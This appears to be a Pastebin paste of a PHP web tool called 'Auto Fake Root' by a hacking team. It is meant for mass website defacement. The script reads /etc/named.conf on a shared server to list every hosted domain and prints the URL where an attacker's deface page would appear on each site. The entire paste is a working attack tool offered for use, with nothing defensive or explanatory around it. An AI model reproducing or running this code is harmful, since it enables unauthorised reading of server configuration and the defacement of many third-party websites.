Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <title>Closed by Falcon-G21</title>
- <head>
- <meta charset="utf-8">
- <link rel="SHORTCUT ICON" href="http://anas-tav.blogspot.com/favicon.ico">
- <meta property="og:keywords" content="Falcon-G21, Falcon-G21 Team Dark, Aihara Anwaru, Hacking, Deface, Zone-DB, Zone-H"/>
- <meta name="google-site-verification" content="c3TrhimarnRGTIKtlr38L_eM4BfT60vRS9XklBruFvI" />
- <meta property="og:title" content="Closed by Falcon-G21"/>
- <meta property="og:description" content="#Silent to be Better"/>
- <meta property="og:locale" content="id_ID"/>
- <meta property="og:locale:alternate" content="en_US" />
- <meta http-equiv='Content-Type' content='text/html; charset=windows-1252' />
- <meta name='googlebot' content='index,follow' />
- <meta name='robots' content='all' />
- <meta name='robots schedule' content='auto' />
- <meta name='distribution' content='global' />
- <meta name='author' content='Aihara Anwaru' />
- <meta name="geo.placename" content="Indonesia"/>
- <meta name="robots" content="index, follow"/>
- <meta name="viewport" content="width=device-width, initial-scale=1"/>
- <link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
- <style type="text/css">
- body { background-color:transparan;background:#000;background-image: url("http://fc08.deviantart.net/fs71/i/2013/140/0/b/red_forest_background_by_komtess_narbenherz-d65wyaz.jpg");background-position: center; background-size:100%; background-attachment: fixed;background-repeat: repeat;
- }
- a {
- text-decoration:none;
- color:#aaaaaa;
- }
- a:hover {
- text-decoration:none;
- color:red;
- }
- </style>
- </head>
- <body>
- <br>
- <center>
- <font size="8" face="Iceland" style="color: #00FF00;text-shadow: 0px 1px 7px green;">Auto Fake Root by Falcon-G21</font><br>
- </center>
- <center>
- <form action="" method="post">
- <input type="text" placeholder="username" name="uname">
- <input type="text" placeholder="file deface name" name="file" size="20">
- <input type="submit" name="x" value="run">
- </form><br>
- <?php
- @set_time_limit(0);
- if(isset($_POST['x'])){
- $user = $_POST['uname'];
- $deface = $_POST['file'];
- $rx4 = @file('/etc/named.conf');
- if(!$rx4)
- {
- die (" can't read /etc/named.conf");
- }
- else
- {
- foreach($rx4 as $rx5){
- if(eregi('zone',$rx5)){
- preg_match_all('#zone "(.*)"#',$rx5,$rx6);
- flush();
- if(strlen(trim($rx6[1][0])) >2){
- $rx7 = posix_getpwuid(@fileowner('/etc/valiases/'.$rx6[1][0]));
- $rx8 = $rx7['name'] ;
- $rx8 = $rx6[1][0];
- $rx9 = '\.ir';
- $rx10 = '\.il';
- if (eregi("$rx9",$rx6[1][0]) or eregi("$rx10",$rx6[1][0]) )
- {
- //$rx8 = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$rx6[1][0].'</div>';
- }
- echo "<font face='Iceland' size=4 style='color: #00FF00;text-shadow: 0px 1px 7px #0D8D0D;'>http://$rx8/~$user/$deface </font><br />";
- flush();
- }
- }
- }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment